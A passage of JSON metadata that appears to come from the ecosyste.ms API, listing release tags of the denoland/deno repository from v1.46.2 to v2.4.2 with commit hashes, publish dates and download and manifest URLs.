cies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosys